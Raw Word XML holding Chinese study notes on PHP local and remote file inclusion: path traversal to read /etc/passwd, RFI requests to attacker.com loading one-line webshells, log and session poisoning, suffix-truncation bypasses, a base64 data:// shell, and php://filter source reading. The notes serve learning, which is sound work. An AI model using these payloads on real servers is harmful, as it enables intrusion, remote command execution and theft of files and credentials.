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1F1063" w14:textId="33E761F7" w:rsidR="004935FF" w:rsidRDefault="00644746">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6030B" w14:textId="6E124806" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="0064474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脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099D2E9F" w14:textId="5B906CDB" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="0064474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检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAD0691" w14:textId="5962E695" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="0064474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利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4234B693" w14:textId="3A8F7009" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="0064474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类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC9ED4D" w14:textId="05B6EF58" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="00644746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修复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5608C188" w14:textId="7025702E" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="00644746"/>
    <w:p w14:paraId="674D9523" w14:textId="265F4672" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="00644746"/>
    <w:p w14:paraId="301E3804" w14:textId="1257B890" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="00644746"/>
    <w:p w14:paraId="4A502E40" w14:textId="6F87582F" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="00644746">
      <w:r w:rsidRPr="00644746">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3052F935" wp14:editId="7764C285">
            <wp:extent cx="5274310" cy="4032250"/>
            <wp:effectExtent l="0" t="0" r="254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3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EE442" w14:textId="40B7921A" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="00644746"/>
    <w:p w14:paraId="5D6CC5D6" w14:textId="49B8DD0C" w:rsidR="00644746" w:rsidRDefault="00644746" w:rsidP="00644746">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分为</w:t>
      </w:r>
      <w:r w:rsidR="008318CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r w:rsidR="008318CF">
        <w:t xml:space="preserve"> file include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404E5C2" w14:textId="3E67E0A9" w:rsidR="008318CF" w:rsidRDefault="008318CF" w:rsidP="00644746">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和 </w:t>
      </w:r>
      <w:r>
        <w:t>remote file include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32228BBC" w14:textId="528E6616" w:rsidR="008318CF" w:rsidRDefault="008318CF" w:rsidP="00644746"/>
    <w:p w14:paraId="36A01843" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>后果</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>：本地敏感文件泄露（LFI）</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>攻击者传入：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>?page</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>=../../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>拼接后：include('../../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>/passwd');</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>因为 passwd 里没有 &lt;?php 标签，服务器不会执行它，而是直接把文件内容原样吐出来，导致密码文件泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CF913D" w14:textId="3BEF3841" w:rsidR="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>后果二：远程代码执行（RCE）——更严重</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>如果服务器开启了 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>allow_url_include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>（允许包含远程文件），攻击者传入：</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>?page=http://黑客.com/shell.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>拼接后：include('http://黑客.com/shell.txt');</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>如果 shell.txt 里面写的是 &lt;?php system($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>'])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>&gt;，服务器就会把这行代码抄过来当</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:lastRenderedPageBreak/>
        <w:t>作自己的PHP代码执行。从此，攻击者只需访问 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>index.php?cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>，就能在你的服务器上执行操作系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DDC6B" w14:textId="3D0DE7A9" w:rsidR="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF"/>
    <w:p w14:paraId="597D22B9" w14:textId="30A9F55D" w:rsidR="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF"/>
    <w:p w14:paraId="0336C8AE" w14:textId="67BD7128" w:rsidR="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF"/>
    <w:p w14:paraId="69AB0357" w14:textId="60AC2274" w:rsidR="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF"/>
    <w:p w14:paraId="5F1FF432" w14:textId="33C64F11" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>Lfi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>: 玩法</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>（无需上传）：信息泄露</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>这是 LFI 最直接的用法。攻击者不需要上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>传任何</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>文件，直接利用路径穿越去读服务器上已有的敏感文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>比如：?page</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>/../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>/passwd （Linux密码）或 ?page=../../../../windows/win.ini （Windows信息）。甚至能直接读取网站的源码（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>）和数据库配置文件（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>）。只要文件存在且权限够，直接读，根本不用传。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E808F7" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>玩法二（配合上传）：代码执行（RCE）</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>要想通过 LFI 获得服务器权限（执行命令），确实需要让服务器上存在一个含有恶意代码的文件。但这个文件不一定是攻击者“上传”的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BACCDA9" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>实战中，常用这 3 种方式“造”出这个文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5AB5BE" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t xml:space="preserve">配合文件上传点：网站如果有头像上传功能，攻击者上传一个图片马（图片里藏了 &lt;?php </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>phpinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>();?&gt;），然后通过 LFI 去包含这张图片（例如 ?page=../../uploads/avatar.jpg）。图片被包含时，里面的 PHP 代码就会被执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FB22B3" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>日志投毒（</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>最</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>经典，无需上传）：攻击者不传文件，而是把恶意代码写在 User-Agent（浏览器标识） 或访问路径里。服务器会把访问记录记在 access.log 日志文件里。攻击者再利用 LFI 去包含这个服务器自带的日志文件（?page=../../var/log/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>/access.log），日志里的恶意代码就被执行了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6EFD59" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>Session 文件投毒：利用 PHP 的 Session 机制，把恶意代码写到服务器本地的 Session 文件中，再通过 LFI 包含它。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B2B407" w14:textId="62FA34BE" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF"/>
    <w:p w14:paraId="237E772C" w14:textId="7C0FF356" w:rsidR="008318CF" w:rsidRDefault="008318CF" w:rsidP="00644746">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rfi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79652692" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>玩法</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>：最粗暴的“一句话木马”（Get Shell）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3885A98C" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>攻击者在自己公网服务器上放一个 shell.txt，内容写：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC63919" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21895ABC" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>&lt;?php @eval($_POST['password'])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6AB271" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>然后构造请求：</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>http://victim.com/index.php?page=http://attacker.com/shell.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>服务器会把远程的 shell.txt 拉下来当 PHP 执行。之后攻击者用蚁剑（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>AntSword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>）或菜刀连接 http://victim.com/index.php?page=http://attacker.com/shell.txt，密码输 password，整个服务器的文件目录瞬间暴露，直接拿下网站权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C7236" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>玩法二：“即时命令执行”（无需 POST 交互）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC687AB" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>如果目标服务器不允许 POST 大包，或者攻击者想快速验证，就在远程 cmd.txt 里写：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074F5CF4" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADA81A" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>&lt;?php system($_GET['c'])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4316AE69" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>攻击者访问：</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>http://victim.com/index.php?page=http://attacker.com/cmd.txt&amp;c=whoami</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>服务器返回的就是 www-data 或 system 用户信息。用这个姿势，攻击者可以直接在 URL 里执行任何系统命令（ls、cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>/passwd），</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>相当于获得了一个“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>浏览器里的终端”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582DB820" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:lastRenderedPageBreak/>
        <w:t>玩法三：“致命绕过技巧”（解决后缀拼接难题）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD967D" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>很多开发者虽然用了 include，但会加后缀，比如代码是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578324B5" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2411CA" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>include($_GET['page'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>] .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t xml:space="preserve"> '.php'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C21D5EA" w14:textId="4EFFFB7F" w:rsidR="007513D7" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>攻击者传 http://attacker.com/shell.txt，拼接后变成 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>shell.txt.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>，服务器拉不到这个文件就报错了。但攻击者有一个</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>极其鸡贼的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>绕过法：</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>传参改成：?page=http://attacker.com/shell.txt?</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>服务器拼接后变成：http://attacker.com/shell.txt?.php</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>在 PHP 的底层文件流处理中，? 后面的 .php 被当作 Query String（查询字符串），文件系统只认 shell.txt，成功绕过。如果 # 没被转码，用 # 也行，但 # 在 URL 里容易截断，? 更通用。</w:t>
      </w:r>
      <w:r w:rsidR="007513D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="007513D7">
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidR="007513D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以截断。长度截断也行，还有什么方法可以用的？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB9B18" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>玩法四：“零文件攻击”（终极白嫖玩法）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F79CAEC" w14:textId="77777777" w:rsidR="008318CF" w:rsidRPr="008318CF" w:rsidRDefault="008318CF" w:rsidP="008318CF">
      <w:r w:rsidRPr="008318CF">
        <w:t>攻击者甚至不需要在自己服务器上放任何文件，直接利用 PHP 内置的 data:// 或 php://input 伪协议（虽然算 LFI 范畴，但常被 RFI 攻击者混用）。</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>构造请求：</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTs/Pg==</w:t>
      </w:r>
      <w:r w:rsidRPr="008318CF">
        <w:br/>
        <w:t>解码后就是 &lt;?php system($_GET['c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>']);?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008318CF">
        <w:t>&gt;。利用这个，攻击者连一台公网服务器都不需要租，只需一个 URL 参数，就能直接植入后门并执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF729C6" w14:textId="6D3696ED" w:rsidR="008318CF" w:rsidRDefault="008318CF" w:rsidP="00644746"/>
    <w:p w14:paraId="1E09987E" w14:textId="7490FB14" w:rsidR="004B6247" w:rsidRDefault="004B6247" w:rsidP="00644746">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话因为会识别到&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>?php?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接执行，不能读取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E269C01" w14:textId="1A3B8BE9" w:rsidR="004B6247" w:rsidRDefault="004B6247" w:rsidP="00644746">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是使用filter就可以转化为base</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来读取源码可以得知一些信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29068A4B" w14:textId="27E5760E" w:rsidR="008318CF" w:rsidRDefault="00A72811" w:rsidP="00A72811">
      <w:r w:rsidRPr="00A72811">
        <w:t>?page=php://filter/convert.base64-encode/resource=index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EECFCE" w14:textId="7369B24F" w:rsidR="00A72811" w:rsidRDefault="00A72811" w:rsidP="00A72811">
      <w:r>
        <w:t>Post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传数据后，使用input来执行body里面的代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55485B98" w14:textId="7973304C" w:rsidR="00A72811" w:rsidRDefault="00A72811" w:rsidP="00A72811">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>page=php://input?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5310DED3" w14:textId="49413160" w:rsidR="004B6247" w:rsidRDefault="004B6247" w:rsidP="00A72811"/>
    <w:p w14:paraId="650FF8DA" w14:textId="30CAC040" w:rsidR="004B6247" w:rsidRDefault="004B6247" w:rsidP="00A72811"/>
    <w:p w14:paraId="6D3E3728" w14:textId="06D6E68E" w:rsidR="004B6247" w:rsidRDefault="004B6247" w:rsidP="00A72811"/>
    <w:p w14:paraId="7D579426" w14:textId="23DB6959" w:rsidR="004B6247" w:rsidRDefault="004B6247" w:rsidP="00A72811"/>
    <w:p w14:paraId="33653268" w14:textId="16800C39" w:rsidR="004B6247" w:rsidRDefault="004B6247" w:rsidP="00A72811">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为什么要转换为base</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49619AA2" w14:textId="3498D6BC" w:rsidR="004B6247" w:rsidRDefault="004B6247" w:rsidP="00A72811">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原因：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6672B573" w14:textId="6FEC3B14" w:rsidR="004B6247" w:rsidRDefault="004B6247" w:rsidP="00A72811">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不转换浏览器可能当成代码执行，有些内容看不到，不是乱码的问题，转换为base</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以完整看到内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A35598" w14:textId="191779D2" w:rsidR="009C3AE8" w:rsidRDefault="009C3AE8" w:rsidP="00A72811"/>
    <w:p w14:paraId="34A91959" w14:textId="28E4F4D4" w:rsidR="009C3AE8" w:rsidRDefault="009C3AE8" w:rsidP="00A72811">
      <w:r>
        <w:t>%23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  %20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是空格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7291216F" w14:textId="44BC96E9" w:rsidR="009C3AE8" w:rsidRDefault="009C3AE8" w:rsidP="00A72811"/>
    <w:p w14:paraId="11F63E97" w14:textId="2ECBE772" w:rsidR="009C3AE8" w:rsidRDefault="009C3AE8" w:rsidP="00A72811"/>
    <w:p w14:paraId="5F7AC9EB" w14:textId="7B8E1F48" w:rsidR="009C3AE8" w:rsidRDefault="00D71AC9" w:rsidP="00A72811">
      <w:r w:rsidRPr="00D71AC9">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E8714CA" wp14:editId="2CDC757C">
            <wp:extent cx="5274310" cy="1924050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2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30D70" w14:textId="0B3733F8" w:rsidR="00020FE2" w:rsidRDefault="00020FE2" w:rsidP="00A72811"/>
